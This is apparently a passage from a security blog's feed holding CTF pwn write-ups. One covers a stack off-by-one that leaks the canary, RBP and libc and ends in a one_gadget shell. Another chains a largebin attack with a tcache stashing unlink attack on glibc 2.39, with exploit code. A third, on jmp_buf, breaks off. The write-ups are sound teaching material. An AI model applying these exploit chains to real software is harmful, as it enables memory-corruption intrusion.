&lt;p&gt;Interestingly the &lt;code&gt;max_chars&lt;/code&gt; variable is declared at the start of the function and stored on the stack. But technically it isn&apos;t needed, the developer could have simply put the number in the &lt;code&gt;read_stdin()&lt;/code&gt; arguments.&lt;/p&gt;
&lt;p&gt;Now let&apos;s explore the &lt;code&gt;read_stdin()&lt;/code&gt; function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char *__fastcall read_stdin(char *buffer, unsigned __int8 max_chars)
{
  char *char_ptr; // rax
  unsigned __int8 i; // [rsp+1Fh] [rbp-1h]

  for ( i = 0; i &amp;lt;= max_chars; ++i )
  {
    if ( read(0, &amp;amp;buffer[i], 1uLL) != 1 || buffer[i] == &apos;\n&apos; )
    {
      char_ptr = &amp;amp;buffer[i];
      *char_ptr = 0;
      return char_ptr;
    }
  }
  return char_ptr;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This function behaves a little strangely: it iterates &lt;code&gt;max_chars + 1&lt;/code&gt; times, reading at each loop one byte. If the byte is a newline, or if we read less than &lt;code&gt;max_chars + 1&lt;/code&gt; bytes, the last byte gets overwritten by a zerobyte &lt;code&gt;\00&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;So think about this scenario: &lt;code&gt;max_chars&lt;/code&gt; is set to 64, but the loop lets us read up to 65 bytes (&lt;code&gt;i &amp;lt;= max_chars&lt;/code&gt;). If we send exactly 65 &lt;code&gt;A&lt;/code&gt;s without a newline, we write one byte outside the bounds of the buffer without even writing a nullbyte.&lt;/p&gt;
&lt;p&gt;But where exactly does the OOB byte land?&lt;/p&gt;
&lt;h2&gt;One byte to rule them all&lt;/h2&gt;
&lt;p&gt;Looking at the &lt;code&gt;echo()&lt;/code&gt; function we see that the &lt;code&gt;max_chars&lt;/code&gt; variable is allocated directly after our buffer on the stack, this is great! With a single byte it is possible to overwrite &lt;code&gt;max_chars&lt;/code&gt; with something like &lt;code&gt;0xFF&lt;/code&gt; and get a big buffer overflow.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[rbp-0x50] buffer (64 bytes)  &amp;lt;-- Fills with &quot;A&quot;*64 
[rbp-0x10] max_chars (1 byte) &amp;lt;-- Can be overwritten by &quot;\xFF&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, we need to precisely chose &lt;code&gt;max_chars&lt;/code&gt;! The variable must be exactly the amount of bytes we want to write minus one, else a zerobyte will be added at the end, this could break our exploit.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r.sa(b&quot;echo &quot;, b&quot;A&quot;*64 + b&quot;\x48&quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Yet we still have a little hurdle to overcome to get to a return address overwrite: the stack canary.&lt;/p&gt;
&lt;h2&gt;One byte to leak them&lt;/h2&gt;
&lt;p&gt;Stack canary have a nice property (or not, depends on the situation), the first byte is always a zerobyte. On one hand it stops us from leaking the canary with a simple print function because the nullbyte acts as a string terminator, on the other hand we can simply overwrite that byte without losing information about the canary.&lt;/p&gt;
&lt;p&gt;By overflowing the buffer till the first byte of the canary the logic separation between the string and the canary bytes is lost, as such &lt;code&gt;puts()&lt;/code&gt; will continue printing till a nullbyte is reached, this will also leak the saved RBP conveniently.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r.sa(b&quot;echo &quot;, b&quot;A&quot;*64 + b&quot;\x77&quot; + b&quot;B&quot;*7 + b&quot;Z&quot;) #0x49 bytes, max_chars must be \x48
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;[rbp-0x50] buffer (64 bytes)  &amp;lt;-- Fills with &quot;A&quot;*64
[rbp-0x10] max_chars (1 byte) &amp;lt;-- Overwritten by &quot;\x77&quot; (expands loop) 
[rbp-0x0F] padding (7 bytes)  &amp;lt;-- Fills with &quot;B&quot;*7 
[rbp-0x08] canary (8 bytes)   &amp;lt;-- LSB overwritten by &quot;Z&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will get us:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;AAAAA...AAAOBBBBBBBZO\x93;\x11Q_|\xb0\x84D\x80\xfe\x7f
                   |    canary    | Saved Base Pointer |
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can use the &lt;code&gt;Z&lt;/code&gt; character as a delimiter to slice the output (this is why we added it), parse the leaked bytes, and reconstruct the canary and the saved RBP.&lt;/p&gt;
&lt;p&gt;:::note
Remember that the leaked canary will be 7 bytes long, the leading zero byte must be added before unpacking the value with &lt;code&gt;u64(canary_leak)&lt;/code&gt;.
:::&lt;/p&gt;
&lt;p&gt;We are finally ready to overwrite the saved return pointer. But what do we point it to? We need one more leak... a pointer to Libc.&lt;/p&gt;
&lt;h3&gt;Getting a Libc pointer&lt;/h3&gt;
&lt;p&gt;Remember that the &lt;code&gt;main()&lt;/code&gt; is not truly the entrypoint of a C program. If you look at the stack with a debugger directly after &lt;code&gt;main()&lt;/code&gt; is called, you will see on the top of the stack the return address to a location inside a function called &lt;code&gt;__libc_start_call_main&lt;/code&gt;, as the name suggests this function is stored in the standard library.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;00:0000│ rsp 0x7ffc0c2e3678 —▸ 0x7fc4ede2a1ca ◂— mov edi, eax #__libc_start_call_main + ???
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can leak this address exactly like we leaked the other address:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r.sa(b&quot;echo &quot;, b&quot;A&quot;*64 + b&quot;\x5f&quot; + b&quot;b&quot;*7 + b&quot;B&quot;*0x28 + b&quot;C&quot;*7 + b&quot;Z&quot;) #0x78 bytes, max_char must be \x77
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;[rbp-0x50] buffer (64 bytes)   &amp;lt;-- Fills with &quot;A&quot;*64
[rbp-0x10] max_chars (1 bytes) &amp;lt;-- Overwritten by &quot;\x5f&quot;
[rbp-0x0F] padding (7 bytes)   &amp;lt;-- Fills with &quot;b&quot;*7 
[rbp-0x08] canary (8 bytes)    &amp;lt;-- Fills with &quot;B&quot;s
[rbp-0x00] saved RBP (8 bytes) &amp;lt;-- Fills with &quot;B&quot;s
[rbp+0x08] saved RIP (8 bytes) &amp;lt;-- Fills with &quot;B&quot;s
[rbp+0x10] *argv (8 bytes)     &amp;lt;-- Fills with &quot;B&quot;s
[rbp+0x18] argc (4 bytes)      &amp;lt;-- Fills with &quot;B&quot;s
[rbp+0x1c] padding (4 bytes)   &amp;lt;-- Fills with &quot;B&quot;s
[rbp+0x1c] saved RBP (8 bytes) &amp;lt;-- Fills with 7 &quot;C&quot;s and one &quot;Z&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;One byte to bring them all&lt;/h2&gt;
&lt;p&gt;Now we have everything we need. Here is the final exploitation path: We overflow the buffer all the way down to the return address. Along the way, we carefully replace the canary and the base pointer with the values we leaked earlier, acting as if nothing ever happened so the canary check succeeds. Finally, we overwrite the return address to redirect execution to a &lt;code&gt;one_gadget&lt;/code&gt; in Libc to get a shell.&lt;/p&gt;
&lt;h3&gt;Finding the right Libc version&lt;/h3&gt;
&lt;p&gt;To find the correct libc version on the remote server, &lt;a href=&quot;https://libc.blukat.me/?&quot;&gt;libc.blukat.me &lt;/a&gt;is our best friend. We can input our leaked libc address and its symbol name to find all libc versions that match that offset.
But what symbol should we query for? The functions name is &lt;code&gt;__libc_start_call_main&lt;/code&gt; but the leak gives us an address to somewhere in the middle. Fortunately we can use &lt;code&gt;__libc_start_main_ret&lt;/code&gt; for exactly this scenario.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/index-001-1.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;It is often helpful to download the newest matched version and if it doesnt work look at the older ones.  By using the One_gadget utility from your shell (or directly inside pwndbg) we can get a working gadget.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/index-002.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Now we can send the last echo command!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r.sa(b&quot;echo &quot;, b&quot;\0&quot;*72 + p64(canary_l) + p64(stack_l + 0x8) + p64(libc_l + 0xef52b))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;:::note
When you have a buffer overflow and control the RBP, you can often make &quot;unusable&quot; &lt;code&gt;one_gadgets&lt;/code&gt; viable. For example, the gadget in this exploit requires &lt;code&gt;[rbp-0x78] == NULL&lt;/code&gt;. By intentionally moving the RBP and padding our overflow with null bytes, we satisfy the gadget&apos;s constraints and successfully trigger a shell!
:::&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[rbp-0x50] buffer + others (64 bytes)   &amp;lt;-- Fills with &quot;\0&quot;
[rbp-0x08] canary (8 bytes)             &amp;lt;-- Fills with real canary
[rbp-0x00] saved RBP (8 bytes)          &amp;lt;-- Fills with stack_l + 0x8
[rbp+0x08] saved RIP (8 bytes)          &amp;lt;-- Fills with Onegadget
&lt;/code&gt;&lt;/pre&gt;
</content:encoded><author>David Hermes</author></item><item><title>House of Fish: TRX CTF 2026</title><link>https://blog.davidherm.es/posts/hof</link><guid isPermaLink="true">https://blog.davidherm.es/posts/hof</guid><description>Writeup of a blind heap challenge through large bin attack and smallbin stash unlink attack.</description><pubDate>Mon, 27 Apr 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;This past weekend, my team and I participated in the TRX 2026 CTF. It was one of the most difficult CTFs this year (so far, at least). Sadly, I skill-issued my way to the end of the 48 hour competition with zero solves.
Luckily, my teammates were much more locked in and solved a bunch of challenges. I only managed to solve this blind heap challenge the day after the event ended, but it incorporates some cool techniques that I want to document for myself and for you. Let&apos;s start with the code.&lt;/p&gt;
&lt;h2&gt;chall.c&lt;/h2&gt;
&lt;p&gt;I wrote some comments inside the code snippets to make it a little easier to understand. Also notice the complete absence of a read function, as I said before, this is a blind heap challenge, so no leaks.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void create() {
	unsigned int idx;
	unsigned int size;
	void* ptr;
	
	idx = get_idx();   // max 0x100 slots, more than enough...
	size = get_size(); // max 0x500 bytes (gets rounded to the next multiple of 16!!!)
	
	ptr = malloc(size);
	printf(&quot;allocated size: %d\n&quot;, size);
	
	ptrs[idx] = ptr;
	sizes[idx] = size;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;void update() {
	unsigned int idx;
	
	idx = get_idx();
	
	printf(&quot;enter %d bytes: &quot;, sizes[idx]);
	// this function expects exactly sizes[idx] bytes, no more no less. 
	read_exactly(STDIN_FILENO, ptrs[idx], sizes[idx]);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;void delete() {
	unsigned int idx;
	
	idx = get_idx();
	free(ptrs[idx]); //use after free vulnerability!
}	
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;void copy() {
	unsigned int dest;
	unsigned int src;
	
	dest = get_idx(); 
	src = get_idx();
	
	// because of the rounding in create() it is not possible to copy 0x8 bytes, only multiples of 16.
	
	memcpy(ptrs[dest], ptrs[src], min(sizes[dest], sizes[src]));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;//This is one of the menu options, so we only need to write that 16 bytes value into *admin
void win() {
	if (*admin == 0xdeadbeefdeadcafe) {
		puts(&quot;good boy&quot;);
		system(&quot;/bin/sh&quot;);
	} else 
		die(&quot;admin&quot;);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You notice that admin variable? It contains a pointer to a mapped memory area with a fixed address.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;admin = (unsigned long*) mmap((void*) 0x1337000, 8, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is very important because it is the only pointer we know of in the entire binary. Looking at the checksec output confirms this.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/checksec.webp&quot; alt=&quot;xhecksec output showing all security mitigations active.&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;blind heap exploitation&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;images/headline.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;We need a way to make &lt;code&gt;malloc()&lt;/code&gt; return our admin pointer instead of a normal chunk. this would normally be solved by a tcache poisoning attack. But without a leak, we cannot recover the mangling key (I wrote about this key in a past writeup: &lt;a href=&quot;https://blog.davidherm.es/posts/babyheap/#tcache-poisoning&quot;&gt;link&lt;/a&gt;). So is it possible to make malloc return an arbitrary memory location through tcache without having to deal with the mangling key? Well...&lt;/p&gt;
&lt;h2&gt;tcache stashing unlink attack&lt;/h2&gt;
&lt;p&gt;This technique abuses a mechanism within the smallbins to move a user-controlled pointer into the tcache without needing to leak the tcache mangling key.&lt;/p&gt;
&lt;h3&gt;smallbins&lt;/h3&gt;
&lt;p&gt;Smallbins are &lt;strong&gt;circular doubly-linked lists&lt;/strong&gt; that operate in a &lt;strong&gt;FIFO (First-In, First-Out)&lt;/strong&gt; fashion, unlike LIFO (Last-In, First-Out) used by the tcache and fastbins.
New chunks are inserted at the &lt;strong&gt;head&lt;/strong&gt; (the front) of the bin and removed from the &lt;strong&gt;tail&lt;/strong&gt; (the back) for allocation. On 64-bit systems, smallbins manage chunks ranging from &lt;code&gt;0x20&lt;/code&gt; to &lt;code&gt;0x3F0&lt;/code&gt; bytes.  Smallbins have no fixed count limit, unlike tcache chunks.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/smallbin.webp&quot; alt=&quot;Representation of smallbins&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Looking at the size classes of the smallbin chunk it is possible to notice an &lt;strong&gt;overlap&lt;/strong&gt; with tcache sizes. The reason can be explained by understanding that tcache lists can store only seven elements. When the tcache is full, the allocator must decide where to store the currently freed chunk. Chunks fitting fastbin sizes (typically &lt;code&gt;0x20&lt;/code&gt; to &lt;code&gt;0x80&lt;/code&gt; bytes) are stored in the fastbins. Larger chunks (up to &lt;code&gt;0x3F0&lt;/code&gt; bytes for smallbins) are first placed into the &lt;strong&gt;Unsorted Bin&lt;/strong&gt;. They are only sorted into their respective smallbins during a subsequent &lt;code&gt;malloc&lt;/code&gt; request.&lt;/p&gt;
&lt;h3&gt;tcache stashing&lt;/h3&gt;
&lt;p&gt;Because we mostly prefer to have our target chunk in the tcache, we can leverage a smallbin mechanism called &lt;em&gt;tcache stashing&lt;/em&gt;. Simply put, when the tcache is empty and a chunk from a smallbin is requested, the requested chunk is returned to the user, and all remaining chunks in that smallbin size class get moved into the tcache. &lt;strong&gt;The major advantage here is that smallbins do not mangle their pointers&lt;/strong&gt;. Therefore, if we can poison a smallbin chunk, we can move a user controlled pointer into the tcache without having to leak a mangled pointer.&lt;/p&gt;
&lt;p&gt;Let&apos;s look at the glibc code that handles the stashing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
// GLIBC 2.39 _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L3998)

if (in_smallbin_range (nb))
    {
		
		... malloc returns smallbin chunk ...
		
	      /* While bin not empty and tcache not full, copy chunks over.  */
	    while (tcache-&amp;gt;counts[tc_idx] &amp;lt; mp_.tcache_count
			&amp;amp;&amp;amp; (tc_victim = last (bin)) != bin) {
			
			//tc_victim is the chunk we want to stash, as you can see we always take the last one from the smallbin.
			
			if (tc_victim != 0) 
			{
		    bck = tc_victim-&amp;gt;bk; //the chunk before the last one.
		    set_inuse_bit_at_offset (tc_victim, nb);
			if (av != &amp;amp;main_arena)
				set_non_main_arena (tc_victim);
			    bin-&amp;gt;bk = bck;   // Vulnerability
			    bck-&amp;gt;fd = bin;   
			    tcache_put (tc_victim, tc_idx);
		    }
		}
	}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If we poison the &lt;code&gt;bk&lt;/code&gt; pointer of a smallbin chunk so that it points to an arbitrary memory area, once the chunk gets stashed, at the next iteration, &lt;code&gt;tc_victim&lt;/code&gt; will equal our arbitrary memory pointer.&lt;/p&gt;
&lt;p&gt;But the line directly after our vulnerability creates a problem: &lt;code&gt;bck-&amp;gt;fd = bin&lt;/code&gt; &lt;strong&gt;dereferences the value stored in the&lt;/strong&gt; &lt;code&gt;bk&lt;/code&gt; &lt;strong&gt;position&lt;/strong&gt; of our fake chunk. Consequently, it is necessary that the &lt;code&gt;bk&lt;/code&gt; field of our fake chunk contains a &lt;strong&gt;valid, writable address&lt;/strong&gt;. This ensures the pointer can be dereferenced without crashing, allowing the execution to successfully reach the &lt;code&gt;tcache_put(my_pointer, tc_idx)&lt;/code&gt; function.&lt;/p&gt;
&lt;p&gt;We also need to remember that the stashing mechanism will try to move seven chunks into the tcache list. &lt;strong&gt;When we poison a smallbin chunk we destroy the circular linked list&lt;/strong&gt;, this means that we need to be careful about what chunk we poison, best practice is to modify the 6th chunk so that our fake admin chunk becomes the seventh.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/smallbin_poison.webp&quot; alt=&quot;State of the list after smallbin poisoning.&quot; /&gt;&lt;/p&gt;
&lt;p&gt;:::warning
This method alone &lt;strong&gt;will not work&lt;/strong&gt;. Our admin memory area is completely empty, so this method would try to &lt;strong&gt;dereference a non-existing pointer&lt;/strong&gt; in &lt;code&gt;admin + 0x08&lt;/code&gt; and immediately crash the program.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bck = tc_victim-&amp;gt;bk; // Reads from admin + 0x08 ...
bck-&amp;gt;fd = bin;       // Segfaults if bck isn&apos;t a valid, writable pointer
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But let&apos;s imagine that there is a pointer for argument’s sake, we will learn later how to move a pointer to that position.
:::&lt;/p&gt;
&lt;h3&gt;The attack in practice&lt;/h3&gt;
&lt;p&gt;:::note
You can find a more general explanation of this attack in the shellfish how2heap repo: &lt;a href=&quot;https://github.com/shellphish/how2heap/blob/master/glibc_2.35/tcache_stashing_unlink_attack.c&quot;&gt;link&lt;/a&gt;
:::&lt;/p&gt;
&lt;p&gt;We can allocate 7 chunks of size &lt;code&gt;0x90&lt;/code&gt; that will be used to fill the tcache. After that, we generate 6 chunks of the same size destined for the smallbin list, allocating &lt;code&gt;0x10&lt;/code&gt; guard chunks after each of them so that they do not get coalesced. Then, we free the 7 tcache chunks, followed by the 6 smallbin chunks (but not the guard chunks).
The 6 smallbin chunks will be placed in the unsortedbin first, we must allocate a sufficiently large chunk so that the remaining chunks get moved into the smallbin list.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/bins_stash_unlin1.webp&quot; alt=&quot;Image of pwndbg that shows how the stash unlink attack works.&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Now we can edit the top smallbin chunk&apos;s &lt;code&gt;bk&lt;/code&gt; pointer by overwriting the pointer with the &lt;code&gt;&amp;amp;admin - 0x10&lt;/code&gt; address, after this the &lt;code&gt;bins&lt;/code&gt; view changes slightly:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/bins_stash_unlink2.webp&quot; alt=&quot;After the stash unlink attack&quot; /&gt;&lt;/p&gt;
&lt;p&gt;If we now allocate 8 &lt;code&gt;0x90&lt;/code&gt; sized chunks we would find the admin pointer in the tcache bin! But as i said before we still that pointer in the &lt;code&gt;bk&lt;/code&gt; field.&lt;/p&gt;
&lt;h2&gt;Largebin attack&lt;/h2&gt;
&lt;p&gt;This attack will help us move a heap pointer to the admin area, it is not really important what kind of pointer we use, as long as it is &lt;strong&gt;dereferenceable&lt;/strong&gt; and the memory area it points to is writable. For this we need to understand how largebins work.&lt;/p&gt;
&lt;h3&gt;Largebins&lt;/h3&gt;
&lt;p&gt;Largebins follow some of the same basic rules as smallbins: freed chunks get stored in the unsorted bins and if they are of the required size (&lt;code&gt;0x400&lt;/code&gt; bytes for x86 64 bit) they are sorted into the largebins at the next malloc call. They also possess the normal &lt;code&gt;fd&lt;/code&gt; and &lt;code&gt;bk&lt;/code&gt; pointers to maintain the doubly linked list property. In largebins, this primary list is sorted in strictly &lt;strong&gt;decreasing&lt;/strong&gt; order by chunk size.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/largebin_simple.webp&quot; alt=&quot;Schema showing how largebin lists work&quot; /&gt;&lt;/p&gt;
&lt;p&gt;A notable addition is a &lt;strong&gt;second&lt;/strong&gt; circular doubly linked list. For efficiency reasons different sizes are stored in the same bin (&lt;code&gt;0x400 - 0x43F, 0x440 - 0x47F&lt;/code&gt;, etc.). The &lt;code&gt;fd_nextsize&lt;/code&gt; and &lt;code&gt;bk_nextsize&lt;/code&gt; pointers are used to quickly jump to the right size without having to scan every single chunk, these pointers are only used by the first chunk of a specific size-subclass.  To remove the overhead of having to move the &lt;code&gt;_nextsize&lt;/code&gt; pointers, a malloc operation will remove the tail chunk of a specific size.&lt;/p&gt;
&lt;h4&gt;Example scenario&lt;/h4&gt;
&lt;p&gt;When new chunks of a preexisting size are added, they get appended after the same size head chunk. The diagram below shows that &lt;strong&gt;LC3&lt;/strong&gt; was the first &lt;code&gt;0x420&lt;/code&gt; chunk added,  making it the head that maintains the &lt;code&gt;_nextsize&lt;/code&gt; pointers. When LC4 is sorted in, it is added directly after the head. Additionally a possible LC7 with size &lt;code&gt;0x420&lt;/code&gt; would be added between LC3 and LC4. When a chunk gets malloced with size &lt;code&gt;0x420&lt;/code&gt; the tail chunk is removed, in our example that is LC4.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/largebin_nextsize.webp&quot; alt=&quot;Largebins netsize pointers in action&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;The attack&lt;/h3&gt;
&lt;p&gt;The attack consists in an arbitrary heap pointer write, perfect for the &lt;strong&gt;dereferencing&lt;/strong&gt; problem we have with the tcache stashing unlink attack.
The following &lt;code&gt;_int_malloc()&lt;/code&gt; code handles the sorting of a new chunk (victim) into the largebin in the specific case in which it is the absolute smallest chunk being added.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// GLIBC 2.39 _int_malloc https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L4169

victim_index = largebin_index (size);
bck = bin_at (av, victim_index);
fwd = bck-&amp;gt;fd;

/* maintain large bins in sorted order */
if (fwd != bck) {

    ... stuff ...
    
    /* if smaller than smallest, bypass loop below */
    assert (chunk_main_arena (bck-&amp;gt;bk));
    if ((unsigned long) (size) &amp;lt; (unsigned long) chunksize_nomask (bck-&amp;gt;bk)) {
        fwd = bck; //the bin
        bck = bck-&amp;gt;bk; //last chunk
        
        victim-&amp;gt;fd_nextsize = fwd-&amp;gt;fd; //the biggest head chunk
        
        victim-&amp;gt;bk_nextsize = fwd-&amp;gt;fd-&amp;gt;bk_nextsize; // !!!
        fwd-&amp;gt;fd-&amp;gt;bk_nextsize = victim-&amp;gt;bk_nextsize-&amp;gt;fd_nextsize = victim; // !!!
        //  the line above can be rewritten as
        //  fwd-&amp;gt;fd-&amp;gt;bk_nextsize = victim;
        //  victim-&amp;gt;bk_nextsize-&amp;gt;fd_nextsize = victim;
    }
    else
    {
	    ... stuff ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I marked the important lines with some exclamation marks. Let&apos;s imagine we have a big chunk in the largebin, and we are currently moving a smaller one into the same largebin. If we poison the &lt;code&gt;bk_nextsize&lt;/code&gt; of the large chunk to another writable address, for example &lt;code&gt;&amp;amp;admin&lt;/code&gt;, this code changes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;victim-&amp;gt;bk_nextsize = admin; //&amp;amp;admin gets stored in bk_nextsize of our victim.
fwd-&amp;gt;fd-&amp;gt;bk_nextsize = victim; //not important
victim-&amp;gt;bk_nextsize-&amp;gt;fd_nextsize = victim; //we store a pointer to victim inside the fd_nextsize of admin (admin+0x18)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Knowing this we simply need to save into &lt;code&gt;victim-&amp;gt;bk_nextsize = admin-0x18&lt;/code&gt;. In this way the pointer will be stored exactly in the &lt;code&gt;bk&lt;/code&gt; position for the stashing unlink attack.&lt;/p&gt;
&lt;p&gt;:::note
You can find a more general explanation of this attack in the shellfish how2heap repo: &lt;a href=&quot;https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c&quot;&gt;link&lt;/a&gt;
:::&lt;/p&gt;
&lt;h2&gt;Exploit goes brrr&lt;/h2&gt;
&lt;p&gt;Now that we understand how the two vulnerabilities work, we can chain them. We need to be careful to not break anything, let&apos;s start with the largebin part:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    create(r, 1, 0x420) #Big one, we want to poison this one
    create(r, 2, 0x10)  #Guard
    create(r, 3, 0x410) #Small one, our victim
    create(r, 0, 0x10)  #Guard
    
    #Deleting chunk and allocating bigger chunk to move it to largebins
    delete(r, 1)        
    create(r, 0, 0x4a0)
    
    #Poisoning the large chunk 
    copy(r, 2, 1)
    update(r, 1, b&quot;A&quot;*0x10 + p64(0) + p64(admin-0x18) + b&quot;B&quot;*0x400)
    copy(r, 1, 2)
    
    #Deleting the small one
    delete(r, 3)
    create(r, 0, 0x4a0)
    
    #Cleaning the heap because we are good citizens
    create(r, 0, 0x400)
    create(r, 0, 0x3e0)
    create(r, 0, 0x30)

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The last part helps to remove trash from the freelists. Now we can look in the &lt;code&gt;*admin&lt;/code&gt; area where there should be a pointer now.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/admin_area.webp&quot; alt=&quot;Admin memory area seen through pwndbg&quot; /&gt;&lt;/p&gt;
&lt;p&gt;After this, the stage is prepared for our smallbin shenanigans.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;	#creating 7 tcache chunks 
    for a in range(4, 11):
        create(r, a, 0x90)
    
    #creating 6 smallbin chunks + guards
    for a in range(11, 17):
        create(r, a, 0x90)
        create(r, 0, 0x10) #guard
       
    #populating tcache and smallbins
    for a in range(4, 17):
        delete(r, a)
    create(r, 0, 0x400)
    
    #Poisoning the last smallbin added (head of the list)
    update(r, 16, p64(0) + p64(admin-0x10) + b&quot;B&quot;*0x80)
    
    #Removing the tcache bins
    for a in range(7):
        create(r, 0, 0x90)
       
	#Triggering stash unlink
    create(r, 0, 0x90)
    
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looking in the &lt;code&gt;bins&lt;/code&gt; we should see our chunk in the tcache list ready to be used.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/final_heap.webp&quot; alt=&quot;Final heap state&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The rest is easy. By allocating two chunks and writing in the second we can modify the admin area and write the text required, by triggering that menu option we get the flag.&lt;/p&gt;
</content:encoded><author>David Hermes</author></item><item><title>setjmp: jmp_buf exploitation</title><link>https://blog.davidherm.es/posts/jmp_buf</link><guid isPermaLink="true">https://blog.davidherm.es/posts/jmp_buf</guid><description>about the internal structure of jmp_buf, pointer mangling and how to exploit it.</description><pubDate>Fri, 29 May 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;I participated in the TeamItaly.IT quals this weekend, the Italian pre-qualification CTF for the national team. One of the challenges centered around the &lt;code&gt;setjmp()&lt;/code&gt; and &lt;code&gt;longjmp()&lt;/code&gt; libc functions. I couldn&apos;t find many resources explaining their internals in a ctf context, so here is a short post on this fun technique.&lt;/p&gt;
&lt;h2&gt;setjmp and longjmp&lt;/h2&gt;
&lt;p&gt;While a standard &lt;code&gt;goto&lt;/code&gt; can only jump within the same function, the &lt;code&gt;setjmp&lt;/code&gt; and &lt;code&gt;longjmp&lt;/code&gt; combo acts as a non-local &lt;code&gt;goto&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;setjmp&lt;/code&gt; stores the state of the callee saved registers (&lt;code&gt;RBX&lt;/code&gt;, &lt;code&gt;RBP&lt;/code&gt; &lt;code&gt;R12&lt;/code&gt;-&lt;code&gt;R15&lt;/code&gt;), stack pointer, and instruction pointer into a buffer, and then returns zero. When &lt;code&gt;longjmp&lt;/code&gt; is subsequently called, the registers get restored from the buffer. &lt;code&gt;setjmp&lt;/code&gt; writes its return address as the saved instruction pointer. This means that &lt;code&gt;longjmp&lt;/code&gt; will jump directly after the &lt;code&gt;setjmp&lt;/code&gt; call, additionally it will set the return value (stored in &lt;code&gt;rax&lt;/code&gt;) to the &lt;code&gt;val&lt;/code&gt; argument passed to longjmp.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; #include &amp;lt;setjmp.h&amp;gt;
 int setjmp(jmp_buf env); //returns 0 when called directly
 void longjmp(jmp_buf env, int val); 
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;jmp_buf&lt;/h2&gt;
&lt;p&gt;So, how does &lt;code&gt;setjmp&lt;/code&gt; exactly save our registers? Well, looking into the libc implementation, we find this interesting &lt;code&gt;typedef&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc https://elixir.bootlin.com/glibc/glibc-2.43.9000/source/setjmp/setjmp.h#L36
typedef struct __jmp_buf_tag jmp_buf[1];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;jmp_buf&lt;/code&gt; is defined as an array of only one element of type &lt;code&gt;__jmp_buf_tag&lt;/code&gt;. This is cool because when an array is passed in a function call, it &quot;decays&quot; into a pointer. Without this trick, we would need to prepend an &lt;code&gt;&amp;amp;&lt;/code&gt; in front of the argument. Let&apos;s look at &lt;code&gt;__jmp_buf_tag&lt;/code&gt; now:&lt;/p&gt;
